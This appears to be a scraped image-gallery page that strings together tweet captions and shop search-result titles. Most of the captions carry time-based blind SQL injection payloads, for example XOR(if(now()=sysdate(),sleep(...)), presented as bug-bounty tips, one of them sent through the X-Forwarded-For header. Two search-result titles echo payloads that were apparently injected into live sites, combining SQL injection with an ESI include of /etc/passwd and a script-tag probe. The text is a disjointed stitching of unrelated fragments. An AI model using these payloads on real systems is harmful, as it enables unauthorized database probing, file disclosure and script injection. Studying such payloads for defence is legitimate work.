![nav1ñ🎯 on Twitter: "Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks using nav1ñ🎯 on Twitter: "Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks using](https://pbs.twimg.com/media/Fe0dxb4WIA4cYdw.png)
nav1ñ🎯 on Twitter: "Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks using
Test Payload: 'XOR(if(now()=sysdate(),sleep(10),0))OR' · Issue #4091 · sqlmapproject/sqlmap · GitHub
![Risultati di ricerca per: '<a href="_1_">0"XOR(if(now()=sysdate(),sleep(15), 0))XOR"Z</a><esi:include src="/etc/passwd"/>9951093<img src=xyz' Risultati di ricerca per: '<a href="_1_">0"XOR(if(now()=sysdate(),sleep(15), 0))XOR"Z</a><esi:include src="/etc/passwd"/>9951093<img src=xyz'](https://bizzwai.it/media/catalog/product/cache/b7c3598e66aa2bd708a24c693e337b6a/f/a/facebook-marketing-assistito.jpg)
Risultati di ricerca per: '<a href="_1_">0"XOR(if(now()=sysdate(),sleep(15), 0))XOR"Z</a><esi:include src="/etc/passwd"/>9951093<img src=xyz'
![Jawad on Twitter: "Detect Blind SQL INJECTION with these payloads 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z%20=%3E 0'XOR(if(now()=sysdate(), sleep(3),0))XOR'Z '%20WAITFOR Jawad on Twitter: "Detect Blind SQL INJECTION with these payloads 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z%20=%3E 0'XOR(if(now()=sysdate(), sleep(3),0))XOR'Z '%20WAITFOR](https://pbs.twimg.com/media/EwTKDtIUcAA67nC.png)
Jawad on Twitter: "Detect Blind SQL INJECTION with these payloads 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z%20=%3E 0'XOR(if(now()=sysdate(), sleep(3),0))XOR'Z '%20WAITFOR
![Aimagin: Search results for: '<a href="0"XOR(if(now()=sysdate(),sleep(15), 0))XOR"Z">_2_</a>' AND 2*3*8=6*8 AND 'sfTj'='sfTj<ScRiPt >lb3A(9456)</ScRi' Aimagin: Search results for: '<a href="0"XOR(if(now()=sysdate(),sleep(15), 0))XOR"Z">_2_</a>' AND 2*3*8=6*8 AND 'sfTj'='sfTj<ScRiPt >lb3A(9456)</ScRi'](https://www.aimagin.com/pub/media/catalog/product/cache/7f3f8f7f8eb39fc3184391861a60b6d0/d/e/device-node-03.jpg)
Aimagin: Search results for: '<a href="0"XOR(if(now()=sysdate(),sleep(15), 0))XOR"Z">_2_</a>' AND 2*3*8=6*8 AND 'sfTj'='sfTj<ScRiPt >lb3A(9456)</ScRi'
![1bdool492 on Twitter: "Bug : Blind SQL Injection Tips : X-Forwarded-For: 0' XOR(if(now()=sysdate(),sleep(10),0))XOR'Z #bugbountytip https://t.co/4PFiO7aM5d" / Twitter 1bdool492 on Twitter: "Bug : Blind SQL Injection Tips : X-Forwarded-For: 0' XOR(if(now()=sysdate(),sleep(10),0))XOR'Z #bugbountytip https://t.co/4PFiO7aM5d" / Twitter](https://pbs.twimg.com/media/FaMDYC0XgAEG8Ll.png)
1bdool492 on Twitter: "Bug : Blind SQL Injection Tips : X-Forwarded-For: 0' XOR(if(now()=sysdate(),sleep(10),0))XOR'Z #bugbountytip https://t.co/4PFiO7aM5d" / Twitter
![PAVilion on Twitter: "Calling all #firefox users. Please update your #browser now with these two #patches. #cybersecurityawareness #cyberattacks #cyberresilience https://t.co/tYSirkI5JY" / Twitter PAVilion on Twitter: "Calling all #firefox users. Please update your #browser now with these two #patches. #cybersecurityawareness #cyberattacks #cyberresilience https://t.co/tYSirkI5JY" / Twitter](https://pbs.twimg.com/media/FiKHkMXXkAEtqRK.png)
PAVilion on Twitter: "Calling all #firefox users. Please update your #browser now with these two #patches. #cybersecurityawareness #cyberattacks #cyberresilience https://t.co/tYSirkI5JY" / Twitter
![GodFather Orwa 🇯🇴 on Twitter: "I & @XHackerx007 earned $15,000 for my submission on @bugcrowd https://t.co/1MymV8Qkdi #ItTakesACrowd #bugbountytip Inject In Url Its Self Without any Parameter Payload was Here /0'XOR(if(now()=sysdate(),sleep(6),0 ... GodFather Orwa 🇯🇴 on Twitter: "I & @XHackerx007 earned $15,000 for my submission on @bugcrowd https://t.co/1MymV8Qkdi #ItTakesACrowd #bugbountytip Inject In Url Its Self Without any Parameter Payload was Here /0'XOR(if(now()=sysdate(),sleep(6),0 ...](https://pbs.twimg.com/media/FTIFuA0VIAAT9iC.jpg:large)